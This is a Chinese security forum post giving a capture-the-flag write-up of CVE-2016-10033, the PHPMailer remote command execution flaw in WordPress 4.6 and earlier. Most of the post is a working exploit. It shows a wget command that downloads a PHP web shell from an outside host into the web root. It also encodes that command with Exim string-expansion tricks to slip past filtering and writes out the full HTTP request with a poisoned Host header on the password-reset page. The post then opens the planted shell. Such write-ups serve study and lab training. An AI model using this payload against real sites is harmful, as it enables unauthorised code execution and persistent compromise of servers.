安全矩阵

 找回密码
 立即注册
搜索
查看: 2721|回复: 0

WordPress远程命令执行(CVE-2016-10033)

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-8-11 14:41:34 | 显示全部楼层 |阅读模式
1. 漏洞描述
WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。
影响版本WordPress <= 4.6


writeup
启动靶场
访问靶机地址http://ctf.mzxh.xyz:65079/
在找回密码处抓包 http://ctf.mzxh.xyz:65079/wp-login.php?action=lostpassword
构造payload
  1. /usr/bin/wget --output-document /var/www/html/shell.php www.mzxh.xyz/tools/shell.php
复制代码
  1. > `空格` 转化为 ${substr{10}{1}{$tod_log}}
  2. > `/` 转化为 ${substr{0}{1}{$spool_directory}}
复制代码

转换过来就是
  1. {substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}shell.php${substr{10}{1}{$tod_log}}www.mzxh.xyz${substr{0}{1}{$spool_directory}}tools${substr{0}{1}{$spool_directory}}shell.php
复制代码
构造 poc,把上面生成的payload改进poc里,点击GO发送请求包到服务器。
  1. POST /wp-login.php?action=lostpassword HTTP/1.1
  2. Host: target(any -froot@localhost -be ${run{$payload}} null)
  3. Connection: close
  4. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
  5. Accept: */*
  6. Content-Length: 56
  7. Content-Type: application/x-www-form-urlencoded
  8. wp-submit=Get+New+Password&redirect_to=&user_login=admin
复制代码

即下图所示

访问shell地址http://ctf.mzxh.xyz:65079/shell.php
获取shell



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 16:03 , Processed in 0.012696 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表